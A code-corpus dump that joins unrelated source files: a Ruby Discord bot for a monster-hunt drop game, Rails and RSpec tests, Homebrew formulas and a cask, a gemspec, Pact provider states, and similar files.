if random.rand(rate) <= BORDERDROP4
drop.push(EMOJDROP4)
@today_drop[3] = @today_drop[3].to_i + 1
@total_drop[3] = @total_drop[3].to_i + 1
user_data[5] = user_data[5].to_i + 1
dropCount.drop04 = 1
end
#ホーリーローブ
if random.rand(rate) <= BORDERDROP5
drop.push(EMOJDROP5)
@today_drop[4] = @today_drop[4].to_i + 1
@total_drop[4] = @total_drop[4].to_i + 1
user_data[6] = user_data[6].to_i + 1
dropCount.drop05 = 1
end
#太陽剣
if random.rand(rate) <= BORDERDROP6
drop.push(EMOJDROP6)
@today_drop[5] = @today_drop[5].to_i + 1
@total_drop[5] = @total_drop[5].to_i + 1
user_data[7] = user_data[7].to_i + 1
dropCount.drop06 = 1
end
#バゼラルド
if random.rand(rate) <= BORDERDROP7
drop.push(EMOJDROP7)
@today_drop[6] = @today_drop[6].to_i + 1
@total_drop[6] = @total_drop[6].to_i + 1
user_data[8] = user_data[8].to_i + 1
dropCount.drop07 = 1
end
#ファラオカード
if random.rand(rate) <= BORDERDROP8
drop.push(EMOJDROP8)
@today_drop[7] = @today_drop[7].to_i + 1
@total_drop[7] = @total_drop[7].to_i + 1
user_data[9] = user_data[9].to_i + 1
dropCount.drop08 = 1
#cardファイルにカードドロップ者の情報を追記
File.open(FILECARD, 'a') do |f3|
f3.puts(user_name + " " + (@total_down.to_i + 1).to_s + "体目 " + now.strftime('%Y年%m月%d日 %H時%M分%S秒'))
end
#目立つようにカード画像を表示
card = card + "\nhttps://rotool.gungho.jp/icon/4148.png"
end
#アプローズサンダル
if random.rand(rate) <= BORDERDROP9
drop.push(EMOJDROP9)
@today_drop[8] = @today_drop[8].to_i + 1
@total_drop[8] = @total_drop[8].to_i + 1
user_data[10] = user_data[10].to_i + 1
dropCount.drop09 = 1
end
#パサナカード(ハズレカードなので集計対象外)
if random.rand(rate) <= BORDERDROP8
drop.push(EMOJDROP8)
dropCount.drop10 = 1
#目立つようにカード画像を表示
card = card + "\nhttps://rotool.gungho.jp/icon/4099.png"
end
#マルドゥークカード(ハズレカードなので集計対象外)
if random.rand(rate) <= BORDERDROP8
drop.push(EMOJDROP8)
dropCount.drop11 = 1
#目立つようにカード画像を表示
card = card + "\nhttps://rotool.gungho.jp/icon/4112.png"
end
#闇リンゴ(ハズレアイテムなので集計対象外)
if random.rand(rate) <= BORDERDROPEX
drop.push(EMOJDROPEX)
dropCount.drop12 = 1
end
#ノードロップ時の表示
if drop.eql?('')
drop.push(EMOJNODROP)
end
#チャンネルにドロップ判定を表示
event.respond mvp + drop.join("") + card
#resultファイルの更新
@today_down = @today_down.to_i + 1
@total_down = @total_down.to_i + 1
File.open(FILERESULT, 'w') do |f1|
f1.puts(@today_down.to_i)
f1.puts(@today_drop.join(","))
f1.puts(@total_down.to_i)
f1.puts(@total_drop.join(","))
f1.puts(@summary_day.to_i)
f1.close
end
#DB登録:討伐時のドロップ情報
db_faraohunt = @db[:faraohunt]
db_faraohunt.insert(
:hunt_date => now,
:user_id => event.user.id,
:user_distinct => event.user.distinct,
:user_name => event.user.display_name,
:user_hunt_count => user_data[1].to_i ,
:elapsed_time => hunttime,
:drop01 => dropCount.drop01.to_i,
:drop02 => dropCount.drop02.to_i,
:drop03 => dropCount.drop03.to_i,
:drop04 => dropCount.drop04.to_i,
:drop05 => dropCount.drop05.to_i,
:drop06 => dropCount.drop06.to_i,
:drop07 => dropCount.drop07.to_i,
:drop08 => dropCount.drop08.to_i,
:drop09 => dropCount.drop09.to_i,
:drop10 => dropCount.drop10.to_i,
:drop11 => dropCount.drop11.to_i,
:drop12 => dropCount.drop12.to_i,
)
#rankファイルの更新
rank[idx] = user_data.join(",")
File.open(FILERANK, 'w') do |f3|
for i in 0..rank.length - 1 do
f3.puts(rank[i])
end
f3.close
end
#次の沸き時間を設定
now = Time.now
sleeptime = @setting_farao['sleepBasic'] + random.rand(@setting_farao['sleepMargin'])
#ロックファイルの沸き時間を更新
faraotime_raw = (now + sleeptime)
faraotime = faraotime_raw.strftime('%Y%m%d%H%M%S')
lock.puts(faraotime)
#ファイルロック解除
lock.flock(File::LOCK_UN)
#DB登録:ファラオの湧き時間
db_faraotime = @db[:faraotime]
db_faraotime.insert(
:spawn_date => faraotime_raw,
)
lock.close
end
end
#沸き時間が経過するまでBOTをオフライン表示
set_online(bot, false)
end
end
#タブレット精錬コマンド
bot.message(containing: EMOJDROP4) do |event|
#タブレットのドロップ数取得
tabnum = 0
File.open(FILERESULT, 'r') do |f|
@today_down = f.gets
@today_drop = f.gets.split(",")
tabnum = @today_drop[3].to_i
end
#tabletファイルから精錬回数データを取得
tabdata = []
File.open(FILETABLET, 'r') do |f2|
f2.each_line do |line|
if line != ""
tabdata.push(line.toutf8)
end
end
end
#今までのトータル精錬回数を取得
tabtotal = tabdata[0].to_i
#精錬回数データから発言者のデータを取得
idx = -1
user_data = []
user_name = event.user.display_name
for i in 1..tabdata.length-1 do
user_data = tabdata[i].split(",")
if user_name == user_data[0]
idx = i
break
end
end
#精錬回数データに発言者のデータが無い場合は末尾に追加
if idx == -1
tabdata.push(user_name + ",0")
user_data = tabdata[tabdata.length - 1].split(",")
idx = tabdata.length - 1
end
#タブレットドロップ数より精錬回数が少ない場合精錬実行
if user_data[1].to_i < tabnum
#乱数の設定
random = Random.new
value = 10
for i in 0..4 do
if random.rand(99) <= 100 - SEIREN[i]
value = i + 5
break
end
end
if value < 10
msg = "クホホホホ… +" + value.to_s + " タブレットの精錬が失敗しました。"
else
#tablistファイルに+10精錬成功者の情報を追記
File.open(FILETABLIST, 'a') do |f3|
f3.puts(user_name + " " + (tabtotal.to_i + 1).to_s + "本目 " + now.strftime('%Y年%m月%d日 %H時%M分%S秒'))
end
msg = "武具が強くなって君も嬉しいだろ? +" + value.to_s + " タブレットの精錬が成功しました。"
end
#tabletファイルの更新
user_data[1] = user_data[1].to_i + 1
tabdata[idx] = user_data.join(",")
File.open(FILETABLET, 'w') do |f3|
f3.puts((tabtotal+1).to_s)
for i in 1..tabdata.length - 1 do
f3.puts(tabdata[i])
end
f3.close
end
#DB登録:精錬情報
#ユーザー別製錬回数を取得し、+1する
db_tabletuser = @db[:tabletuser]
ds_tabletuser = db_tabletuser.where(:user_id => event.user.id).first()
user_refine_count = 1
if !ds_tabletuser.nil?
user_refine_count = ds_tabletuser[:user_refine_count].to_i + 1
end
db_tabletrefine = @db[:tabletrefine]
db_tabletrefine.insert(
:refine_date => now,
:user_id => event.user.id,
:user_distinct => event.user.distinct,
:user_name => event.user.display_name,
:user_refine_count => user_refine_count,
:refine_result => value.to_i,
)
event.respond msg
end
end
bot.command(:faresult, description:"これまでの討伐数とドロップ数の集計を表示します。") do |event|
event.respond get_summary()
end
bot.command(:farank, description:"討伐数ランキングを表示します。") do |event|
rank = []
down = []
user_data = []
exp = []
disprank = 0
#rankファイルからランキングデータを取得
File.open(FILERANK, 'r') do |f1|
f1.each_line do |line|
rank.push(line.toutf8)
end
end
#ランキングデータからドロップアイテムのポイントを算出
for i in 0..rank.length-1 do
user_data = rank[i].split(",")
pt = 0
pt = pt + user_data[2].to_i * 10001 / (BORDERDROP1 + 1)
pt = pt + user_data[3].to_i * 10001 / (BORDERDROP2 + 1)
pt = pt + user_data[4].to_i * 10001 / (BORDERDROP3 + 1)
pt = pt + user_data[5].to_i * 10001 / (BORDERDROP4 + 1)
pt = pt + user_data[6].to_i * 10001 / (BORDERDROP5 + 1)
pt = pt + user_data[7].to_i * 10001 / (BORDERDROP6 + 1)
pt = pt + user_data[8].to_i * 10001 / (BORDERDROP7 + 1)
pt = pt + user_data[9].to_i * 10001 / (BORDERDROP8 + 1)
pt = pt + user_data[10].to_i * 10001 / (BORDERDROP9 + 1)
pt = (pt * 1.8 / 100).round
down.push(pt)
end
#経験値テーブルを取得
File.open(FILEEXP, 'r') do |f2|
f2.each_line do |line|
exp.push(line.toutf8)
end
end
#ポイントの降順で並び替える
len = down.length
for i in 1..len do
for j in 1..len-i do
if down[j-1].to_i < down[j].to_i
temp1 = down[j]
down[j] = down[j-1]
down[j-1] = temp1
temp2 = rank[j]
rank[j] = rank[j-1]
rank[j-1] = temp2
end
end
end
for i in 0..rank.length-1 do
user_data = rank[i].split(",")
if user_data[0] == event.user.display_name
#表示を始める順位を設定
if i < 2
disprank = 0
elsif i > rank.length-3
disprank = rank.length-5
else
disprank = i - 2
end
end
end
#自分の前後2人までのランキングデータを表示
event.respond "■討伐数ランキング\n\n"
msg = ""
for i in disprank..disprank+4 do
user_data = rank[i].split(",")
#Lvを算出
for j in 0..exp.length-1 do
exp_data = exp[j].split(",")
if user_data[1].to_i * FARAOEXP < exp_data[1].to_i
user_lv = exp_data[0]
break
end
end
msg = msg + (i + 1).to_s + "位 "
msg = msg + user_data[0] + " "
msg = msg + down[i].to_s + "P "
msg = msg + user_lv + " "
msg = msg + user_data[1] + "体 "
msg = msg + "\n "
msg = msg + EMOJDROP1 + user_data[2]
msg = msg + EMOJDROP2 + user_data[3]
msg = msg + EMOJDROP3 + user_data[4]
msg = msg + EMOJDROP4 + user_data[5]
msg = msg + EMOJDROP5 + user_data[6]
msg = msg + EMOJDROP6 + user_data[7]
msg = msg + EMOJDROP7 + user_data[8]
msg = msg + EMOJDROP8 + user_data[9]
msg = msg + EMOJDROP9 + user_data[10]
end
event.respond msg
end
bot.command(:fastatus, description:"自分の討伐数とドロップ数を表示します。") do |event|
rank = []
down = []
user_data = []
exp = []
#rankファイルからランキングデータを取得
File.open(FILERANK, 'r') do |f1|
f1.each_line do |line|
rank.push(line.toutf8)
end
end
#経験値テーブルを取得
File.open(FILEEXP, 'r') do |f2|
f2.each_line do |line|
exp.push(line.toutf8)
end
end
#発言者のデータを表示
for i in 0..rank.length-1 do
user_data = rank[i].split(",")
if user_data[0] == event.user.display_name
#Lvを算出
for j in 0..exp.length-1 do
exp_data = exp[j].split(",")
if user_data[1].to_i * FARAOEXP < exp_data[1].to_i
user_lv = exp_data[0]
break
end
end
#ポイントを算出
pt = 0
pt = pt + user_data[2].to_i * 10001 / (BORDERDROP1 + 1)
pt = pt + user_data[3].to_i * 10001 / (BORDERDROP2 + 1)
pt = pt + user_data[4].to_i * 10001 / (BORDERDROP3 + 1)
pt = pt + user_data[5].to_i * 10001 / (BORDERDROP4 + 1)
pt = pt + user_data[6].to_i * 10001 / (BORDERDROP5 + 1)
pt = pt + user_data[7].to_i * 10001 / (BORDERDROP6 + 1)
pt = pt + user_data[8].to_i * 10001 / (BORDERDROP7 + 1)
pt = pt + user_data[9].to_i * 10001 / (BORDERDROP8 + 1)
pt = pt + user_data[10].to_i * 10001 / (BORDERDROP9 + 1)
pt = (pt * 1.8 / 100).round
msg = user_data[0] + " "
msg = msg + pt.to_s + "P "
msg = msg + user_lv + " "
msg = msg + user_data[1] + "体 "
msg = msg + EMOJDROP1 + user_data[2]
msg = msg + EMOJDROP2 + user_data[3]
msg = msg + EMOJDROP3 + user_data[4]
msg = msg + EMOJDROP4 + user_data[5]
msg = msg + EMOJDROP5 + user_data[6]
msg = msg + EMOJDROP6 + user_data[7]
msg = msg + EMOJDROP7 + user_data[8]
msg = msg + EMOJDROP8 + user_data[9]
msg = msg + EMOJDROP9 + user_data[10]
event.respond msg
break
end
end
end
bot.command(:falist, description:"1/500の壁を越えし者達を表示します。") do |event|
i = 1
msg = "■1/500の壁を越えし者達\n\n"
#cardファイルからカード取得者の一覧を取得し表示
File.open(FILECARD, 'r') do |f3|
f3.each_line do |line|
msg = msg + i.to_s + "枚目:" + line.toutf8
i = i + 1
end
end
event.respond msg
end
bot.command(:tablist, description:"ホルグレンに勝利を収めし者達を表示します。") do |event|
i = 1
msg = "■ホルグレンに勝利を収めし者達\n\n"
#tablistファイルから精錬成功者の一覧を取得し表示
File.open(FILETABLIST, 'r') do |f3|
f3.each_line do |line|
msg = msg + i.to_s + "本目:" + line.toutf8
i = i + 1
end
end
event.respond msg
end
bot.command(:farespawn, help_available:false, description:"湧き時間の再読み込みを行います。") do |event|
#バグ沸き時用再スリープコマンド
#沸き時間
faraotime = ""
now = Time.now
File.open(FILELOCK, 'r') do |lock|
#ファラオの沸き時間を取得
faraotime = lock.gets
end
#沸き時間まで待機
if now.strftime('%Y%m%d%H%M%S').to_i < faraotime.to_i
set_online(bot, false)
else
set_online(bot, true)
end
end
bot.command(:fastop, help_available:false, description:"このBOTを停止させます。") do |event|
#BOT停止用コマンド
if event.user.display_name == "Sato"
bot.stop
end
end
#起動時
bot.ready do |event|
@db = create_database()
File.open(FILERESULT, 'r') do |f|
@today_down = f.gets
@today_drop = f.gets.split(",")
@total_down = f.gets
@total_drop = f.gets.split(",")
@summary_day = f.gets
end
faraotime = ""
now = Time.now
File.open(FILELOCK, 'r') do |lock|
#ファラオの沸き時間を取得
faraotime = lock.gets
end
#沸き時間まで待機
if now.strftime('%Y%m%d%H%M%S').to_i < faraotime.to_i
set_online(bot, false)
else
File.open(FILELOCK, 'w') do |lock|
#ロックファイルの沸き時間を更新
lock.puts(now.strftime('%Y%m%d%H%M%S'))
sleep(1)
end
end
end
#DBインスタンス生成
def create_database()
#何かオプションを指定する場合は下記に追記する
options = {:encoding=>"utf8"}
#DBに接続
database = Sequel.sqlite(@setting_auth['database']['path'] , options)
if @setting_auth['database']['logging']
database.loggers << Logger.new($stdout)
database.loggers.push(Logger.new(@setting_auth['database']['logfile']))
end
return database
end
#resultファイルから討伐数とドロップアイテム数を取得し表示
def get_summary()
msg=""
File.open(FILERESULT, 'r') do |f|
@today_down = f.gets
@today_drop = f.gets.split(",")
@total_down = f.gets
@total_drop = f.gets.split(",")
msg = "■討伐数\n"
msg = msg + "本日:" + @today_down
msg = msg + "合計:" + @total_down + "\n"
msg = msg + "■ドロップアイテム\n"
msg = msg + "本日:"
msg = msg + EMOJDROP1 + @today_drop[0]
msg = msg + EMOJDROP2 + @today_drop[1]
msg = msg + EMOJDROP3 + @today_drop[2]
msg = msg + EMOJDROP4 + @today_drop[3]
msg = msg + EMOJDROP5 + @today_drop[4]
msg = msg + EMOJDROP6 + @today_drop[5]
msg = msg + EMOJDROP7 + @today_drop[6]
msg = msg + EMOJDROP8 + @today_drop[7]
msg = msg + EMOJDROP9 + @today_drop[8]
msg = msg + "合計:"
msg = msg + EMOJDROP1 + @total_drop[0]
msg = msg + EMOJDROP2 + @total_drop[1]
msg = msg + EMOJDROP3 + @total_drop[2]
msg = msg + EMOJDROP4 + @total_drop[3]
msg = msg + EMOJDROP5 + @total_drop[4]
msg = msg + EMOJDROP6 + @total_drop[5]
msg = msg + EMOJDROP7 + @total_drop[6]
msg = msg + EMOJDROP8 + @total_drop[7]
msg = msg + EMOJDROP9 + @total_drop[8]
end
return msg
end
#onlineかどうか
def is_online()
return @is_online
end
#online状態の更新
def set_online(bot, value)
@is_online = value
if @is_online
bot.online
popArea = @setting_farao['location']['area']
popDetails = @setting_farao['location']['details']
location = ""
if popDetails.length > 0
random = Random.new
location = "【#{popDetails[random.rand(popDetails.length - 1)]}】"
end
bot.game = "#{location}#{popArea}"
else
bot.invisible
bot.game = ""
end
end
bot.run :async
begin
#非同期のため、イベント待機
loop do
sleep(0.1)
now = Time.now
#集計日付が変わっていれば集計値初期化
if now.strftime('%Y%m%d').to_i > @summary_day.to_i
#初期化前に今日の結果を通知
msg = get_summary()
bot.send_message(CHANNELID, msg)
@summary_day = now.strftime('%Y%m%d').to_i
File.open(FILERESULT, 'w') do |f|
f.puts("0")
f.puts("0,0,0,0,0,0,0,0,0")
f.puts(@total_down)
f.puts(@total_drop.join(","))
f.puts(@summary_day)
f.close
end
#精錬回数初期化
total_tab = ""
File.open(FILETABLET, 'r') do |f2|
total_tab = f2.gets
end
File.open(FILETABLET, 'w') do |f2|
f2.puts(total_tab)
f2.close
end
end
#沸き時間が過ぎている場合、オンラインにする
if now.strftime('%Y%m%d%H%M%S').to_i >= faraotime.to_i && !is_online()
set_online(bot, true)
end
end
rescue SignalException => ex
puts "SignalException SIG#{Signal::signame(ex.signo)}(#{ex.signo})"
sleep(1)
@db.disconnect
bot.stop
end | 27.881517 | 113 | 0.556519 |
5d4a540688fe5567f2a8a5054f76e09ec8cc9711 | 1,460 | require 'rails_helper'
RSpec.describe FlashMessageHelper, type: :helper do
it { expect(helper).to be_a described_class }
describe '#format_managers_combined_contacts' do
context ' when not expected to start a sentence' do
subject { helper.format_managers_combined_contacts(managers) }
context 'when passed a collection of Users' do
let(:managers) { create_list :manager, 2 }
it 'returns a single html mailto link with all managers' do
is_expected.to eql("<a href='mailto:[email protected];[email protected]'>managers</a>")
end
end
context 'when passed no users' do
let(:managers) { [] }
it 'returns a string' do
is_expected.to eql('a manager')
end
end
end
context 'when expected to start a sentence' do
subject { helper.format_managers_combined_contacts(managers, true) }
context 'when passed a collection of Users' do
let(:managers) { create_list :manager, 2 }
it 'returns a single html mailto link with all managers with capitalised text' do
is_expected.to eql("<a href='mailto:[email protected];[email protected]'>Managers</a>")
end
end
context 'when passed no users' do
let(:managers) { [] }
it 'returns a capitalised string' do
is_expected.to eql('A manager')
end
end
end
end
end
| 32.444444 | 121 | 0.65274 |
7a628ed95ae90f8971e88f12910e2bdd77828e97 | 2,028 | # typed: false
# frozen_string_literal: true
require File.expand_path("../Abstract/abstract-php-extension", __dir__)
# Class for Pecl_http Extension
class PeclHttpAT72 < AbstractPhpExtension
init
desc "Pecl_http PHP extension"
homepage "https://github.com/m6w6/ext-http"
url "https://pecl.php.net/get/pecl_http-3.2.4.tgz"
sha256 "37354ff7680b9b9839da8b908fff88227af7f6746c2611c873493af41d54f033"
head "https://github.com/m6w6/ext-http.git"
license "BSD-2-Clause"
revision 1
bottle do
root_url "https://ghcr.io/v2/shivammathur/extensions"
rebuild 1
sha256 arm64_big_sur: "f851fd9a85a4acead2709466c4a519a66395b9889f340483370b6ce72e60e37f"
sha256 big_sur: "9e1948a38e5371102e3acc6a0143fa4a2a0424dc04b36a6434f4e0a0f98bd48e"
sha256 catalina: "5ccba6a5187f92b7016c9621f0dd71f79ecf94c48f1fc9d6194d6903ae59f2c3"
sha256 cellar: :any_skip_relocation, x86_64_linux: "12734aeba9f8295c0ecb6648811db45a578a37e4656cc7f2a72b5e234996d526"
end
depends_on "brotli"
depends_on "curl"
depends_on "icu4c"
depends_on "libevent"
depends_on "libidn2"
depends_on "shivammathur/extensions/[email protected]"
depends_on "shivammathur/extensions/[email protected]"
def install
args = %W[
--with-http
--with-http-libicu-dir=#{Formula["icu4c"].opt_prefix}
--with-http-zlib-dir=#{MacOS.sdk_path_if_needed}/usr
]
extra_includes = %W[
-I#{Formula["shivammathur/extensions/[email protected]"].opt_include}/php
-I#{Formula["shivammathur/extensions/[email protected]"].opt_include}/php
]
ENV["EXTRA_INCLUDES"] = extra_includes * " "
Dir.chdir "pecl_http-#{version}"
inreplace "src/php_http_api.h", "ext/raphf", "ext/[email protected]"
inreplace "src/php_http_api.h", "ext/propro", "ext/[email protected]"
safe_phpize
system "./configure", "--prefix=#{prefix}", phpconfig, *args
system "make"
prefix.install "modules/#{extension}.so"
write_config_file
end
end
| 36.872727 | 122 | 0.703156 |
ace1d75c84c8b4f8596fc133c15824821ed5a691 | 1,375 | # frozen_string_literal: true
module Opera
module Operation
module Builder
INSTRUCTIONS = %I[validate transaction benchmark step success operation operations].freeze
def self.included(base)
base.extend(ClassMethods)
end
module ClassMethods
def instructions
@instructions ||= []
end
INSTRUCTIONS.each do |instruction|
define_method instruction do |method = nil, &blk|
instructions.concat(InnerBuilder.new.send(instruction, method, &blk))
end
end
end
class InnerBuilder
attr_reader :instructions
def initialize(&block)
@instructions = []
instance_eval(&block) if block_given?
end
INSTRUCTIONS.each do |instruction|
define_method instruction do |method = nil, &blk|
instructions << if !blk.nil?
{
kind: instruction,
instructions: InnerBuilder.new(&blk).instructions
}
else
{
kind: instruction,
method: method
}
end
end
end
end
end
end
end
| 26.960784 | 96 | 0.484364 |
bf9dbdbf6c6ac2b5762e8c45a3bda1ea89b47e79 | 502 | class UsersController < ApplicationController
def show
@user = User.find(params[:id])
end
def new
@user = User.new
end
def create
@user = User.new(user_params)
if @user.save
log_in @user
flash[:success] = "Welcome to the Sample App!"
redirect_to @user
else
render 'new'
end
end
private
def user_params
params.require(:user).permit(:name, :email, :password,
:password_confirmation)
end
end
| 17.928571 | 60 | 0.591633 |
d54ff3d5f5e75a75df96ecfb6fe279df5c68098b | 489 | class CleanupApplicationSettingsPasswordAuthenticationEnabledRename < ActiveRecord::Migration
include Gitlab::Database::MigrationHelpers
DOWNTIME = false
disable_ddl_transaction!
def up
cleanup_concurrent_column_rename :application_settings, :password_authentication_enabled, :password_authentication_enabled_for_web
end
def down
rename_column_concurrently :application_settings, :password_authentication_enabled_for_web, :password_authentication_enabled
end
end
| 30.5625 | 134 | 0.856851 |
b9926a62ca186c254357600f33194654dc8979fb | 784 | cask "calendar-366" do
version "2.9.8,3379"
sha256 "b4702ea8eaba53cc464ac02a36cb41d5537178f0581d21b608787fbfb3e95d43"
url "https://nspektor.com/downloads/Calendar366_v#{version.before_comma}.dmg"
name "Calendar 366 II"
desc "Menu bar calendar for events and reminders"
homepage "https://nspektor.com/calendar366/mac"
livecheck do
url "https://nspektor.com/downloads/Calendar366IIAsset.xml"
strategy :sparkle
end
depends_on macos: ">= :sierra"
app "Calendar 366 II.app"
zap trash: [
"~/Library/Application Scripts/com.nspektor.macos.Calendar-366-II-Mini",
"~/Library/Application Support/Calendar 366 II",
"~/Library/Caches/com.nspektor.macos.Calendar-366-II",
"~/Library/Preferences/com.nspektor.macos.Calendar-366-II.plist",
]
end
| 30.153846 | 79 | 0.737245 |
5dbe5985ae2404871b9175e34a67703ad4bacb8c | 1,937 | # -*- encoding: utf-8 -*-
# stub: rails-html-sanitizer 1.3.0 ruby lib
Gem::Specification.new do |s|
s.name = "rails-html-sanitizer".freeze
s.version = "1.3.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Rafael Mendon\u00E7a Fran\u00E7a".freeze, "Kasper Timm Hansen".freeze]
s.date = "2019-10-06"
s.description = "HTML sanitization for Rails applications".freeze
s.email = ["[email protected]".freeze, "[email protected]".freeze]
s.homepage = "https://github.com/rails/rails-html-sanitizer".freeze
s.licenses = ["MIT".freeze]
s.rubygems_version = "2.7.6".freeze
s.summary = "This gem is responsible to sanitize HTML fragments in Rails applications.".freeze
s.installed_by_version = "2.7.6" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<loofah>.freeze, ["~> 2.3"])
s.add_development_dependency(%q<bundler>.freeze, [">= 1.3"])
s.add_development_dependency(%q<rake>.freeze, [">= 0"])
s.add_development_dependency(%q<minitest>.freeze, [">= 0"])
s.add_development_dependency(%q<rails-dom-testing>.freeze, [">= 0"])
else
s.add_dependency(%q<loofah>.freeze, ["~> 2.3"])
s.add_dependency(%q<bundler>.freeze, [">= 1.3"])
s.add_dependency(%q<rake>.freeze, [">= 0"])
s.add_dependency(%q<minitest>.freeze, [">= 0"])
s.add_dependency(%q<rails-dom-testing>.freeze, [">= 0"])
end
else
s.add_dependency(%q<loofah>.freeze, ["~> 2.3"])
s.add_dependency(%q<bundler>.freeze, [">= 1.3"])
s.add_dependency(%q<rake>.freeze, [">= 0"])
s.add_dependency(%q<minitest>.freeze, [">= 0"])
s.add_dependency(%q<rails-dom-testing>.freeze, [">= 0"])
end
end
| 43.044444 | 112 | 0.660816 |
8722594a317a2f170aac4a9cb1b08de3acbffc24 | 4,484 | require 'spec/support/test_data_builder'
Pact.provider_states_for "Pact Ruby" do
provider_state "the relations for retrieving pacts exist in the index resource" do
no_op
end
provider_state "the relation for retrieving WIP pacts exists in the index resource" do
no_op
end
provider_state "consumer-1 has a WIP pact with provider provider-1" do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_pact
end
end
provider_state 'consumer-1 and consumer-2 have pacts with provider provider-1' do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_pact
.create_consumer('consumer-2')
.create_consumer_version('1.4.0')
.create_pact
end
end
provider_state 'consumer-1 and consumer-2 have pacts with provider provider-1 tagged with tag-1' do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_consumer_version_tag('tag-1')
.create_pact
.create_consumer("consumer-2")
.create_consumer_version('1.4.0')
.create_consumer_version_tag('tag-1')
.create_pact
end
end
provider_state 'consumer-1 and consumer-2 have pacts with provider provider-1 tagged with tag-2' do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_consumer_version_tag('tag-2')
.create_pact
.create_consumer('consumer-2')
.create_consumer_version('1.4.0')
.create_consumer_version_tag('tag-2')
.create_pact
end
end
provider_state 'consumer-1 and consumer-2 have 2 pacts with provider provider-1 tagged with tag-1' do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_consumer_version_tag('tag-1')
.create_pact
.create_consumer('consumer-2')
.create_consumer_version('1.4.0')
.create_consumer_version_tag('tag-1')
.create_pact
end
end
provider_state 'consumer-1 and consumer-2 have 2 pacts with provider provider-1 tagged with tag-2' do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_consumer_version_tag('tag-2')
.create_pact
.create_consumer('consumer-2')
.create_consumer_version('1.4.0')
.create_consumer_version_tag('tag-2')
.create_pact
end
end
provider_state 'consumer-1 and consumer-2 have 2 pacts with provider provider-1' do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_pact
.create_consumer('consumer-2')
.create_consumer_version('1.4.0')
.create_pact
end
end
provider_state "consumer-1 and consumer-2 have no pacts with provider provider-1 tagged with tag-1" do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_pact
.create_consumer('consumer-2')
.create_consumer_version('1.4.0')
.create_pact
end
end
provider_state "consumer-1 and consumer-2 have pacts with provider provider-1 tagged with master" do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_consumer_version_tag('master')
.create_pact
.create_consumer('consumer-2')
.create_consumer_version('1.4.0')
.create_consumer_version_tag('master')
.create_pact
end
end
provider_state "consumer-1 has no pacts with provider provider-1 tagged with tag-1" do
set_up do
TestDataBuilder.new
.create_provider('provider-1')
.create_consumer('consumer-1')
.create_consumer_version('1.3.0')
.create_pact
end
end
end
| 30.503401 | 104 | 0.658787 |
91fe0f18545a4a9d103f5980171e42dd572bf2cc | 2,330 | require 'csv'
require 'tempfile'
describe Mrkt::ImportLeads do
include_context 'with an initialized client'
describe '#import_lead' do
subject { client.import_lead(tempfile) }
let(:tempfile) { Tempfile.new(%w[import-leads csv]) }
let(:response_stub) do
{
requestId: 'c245#14cd6830ae2',
success: true,
result: [
{
batchId: 1,
status: 'Importing'
}
]
}
end
before do
CSV.open(tempfile, 'wb') do |csv|
csv << %w[email firstName lastName]
csv << %w[[email protected] John Snow]
end
stub_request(:post, "https://#{host}/bulk/v1/leads.json")
.with(headers: { content_type: %r{multipart/form-data; boundary=\S+} })
.to_return(json_stub(response_stub))
end
after do
tempfile.unlink
end
it { is_expected.to eq(response_stub) }
end
describe '#import_lead_status' do
subject { client.import_lead_status(1) }
let(:id) { 1 }
let(:response_stub) do
{
requestId: 'c245#14cd6830ae2',
result: [
{
batchId: id,
status: 'Importing',
numOfLeadsProcessed: 4,
numOfRowsFailed: 1,
numOfRowsWithWarning: 0,
message: 'Import completed with errors, 4 records imported (4 members), 1 failed'
}
],
success: true
}
end
before do
stub_request(:get, "https://#{host}/bulk/v1/leads/batch/#{id}.json")
.to_return(json_stub(response_stub))
end
it { is_expected.to eq(response_stub) }
end
describe '#import_lead_failures' do
subject { client.import_lead_failures(1) }
let(:id) { 1 }
let(:response_stub) { '' }
before do
stub_request(:get, "https://#{host}/bulk/v1/leads/batch/#{id}/failures.json")
.to_return(headers: { content_length: 0 })
end
it { is_expected.to eq(response_stub) }
end
describe '#import_lead_warnings' do
subject { client.import_lead_warnings(1) }
let(:id) { 1 }
let(:response_stub) { '' }
before do
stub_request(:get, "https://#{host}/bulk/v1/leads/batch/#{id}/warnings.json")
.to_return(headers: { content_length: 0 })
end
it { is_expected.to eq(response_stub) }
end
end
| 23.535354 | 93 | 0.582403 |
7af9407c722a520122421af1c804bb3ae08db835 | 9,003 | class Volatility < Formula
include Language::Python::Virtualenv
desc "Advanced memory forensics framework"
homepage "https://github.com/volatilityfoundation/volatility"
url "https://github.com/volatilityfoundation/volatility/archive/2.6.1.tar.gz"
sha256 "a8dfdbdb2aaa0885387b709b821bb8250e698086fb32015bc2896ea55f359058"
revision OS.mac? ? 2 : 3
head "https://github.com/volatilityfoundation/volatility.git"
bottle do
cellar :any
sha256 "f41ce1f3f70a5bb1eab7efac3d74ace7dad7bdf581bcb16b7a09d34e27e38d50" => :catalina
sha256 "5bcfa94349a26dc291af274bcf3427851ed2654e36781d05e3774018ee8f7781" => :mojave
sha256 "0d156b81c472080d117d567167d7a6d294376bab6d3c4751b4ca343a25fefa3d" => :high_sierra
end
depends_on "freetype"
depends_on "jpeg"
depends_on :macos # Due to Python 2 (Python 3 support will come with volatility 3)
# https://github.com/volatilityfoundation/volatility3
depends_on "yara"
